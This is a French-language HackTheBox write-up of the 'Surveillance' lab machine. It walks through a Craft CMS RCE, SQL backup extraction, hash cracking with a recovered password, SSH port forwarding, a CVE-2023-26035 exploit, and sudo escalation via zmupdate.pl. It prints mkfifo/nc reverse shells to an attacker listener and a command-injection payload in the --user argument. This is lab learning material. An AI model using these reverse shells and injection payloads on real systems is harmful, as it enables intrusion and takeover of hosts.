HackTheBox Craft CMS SQL Port Forwarding CVE
HTB - Surveillance
Exploitation Craft CMS, extraction de backup SQL, port forwarding et escalade via zmupdate.pl.
2024-02-10 Medium HackTheBox
Reconnaissance
# /etc/hosts
10.10.11.245 surveillance.htb
nmap -p- -sV -v 10.10.11.245Ports ouverts :
- 22/tcp — SSH OpenSSH 8.9p1 Ubuntu
- 80/tcp — HTTP nginx 1.18.0
Exploitation — Craft CMS RCE
nc -nlvp 4444
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc LHOST 4444 >/tmp/fExtraction de la base de données
unzip /html/craft/storage/backups/surveillance--2023-10-17-202801--v4.4.14.sql.zip
cat surveillance--2023-10-17-202801--v4.4.14.sql | grep 'users'Hash récupéré : 39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec
hashcat -m 1400 hash rockyou.txt
# matthew:starcraft122490
ssh matthew@10.10.11.245Mouvement latéral — Port Forwarding
netstat -ntlp
# 8080 LISTEN (service interne)
ssh -L 8081:localhost:8080 matthew@10.10.11.245CVE-2023-26035
nc -nlvp 4445
python3 exploit.py -t http://localhost:8081/ -ip LHOST -p 4445
python3 -c 'import pty;pty.spawn("/bin/bash")'Privilege Escalation — zmupdate.pl
sudo -v
nc -nlvp 4444
sudo zmupdate.pl --version=1 \
--user=';$(rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc LHOST 4444 >/tmp/f)'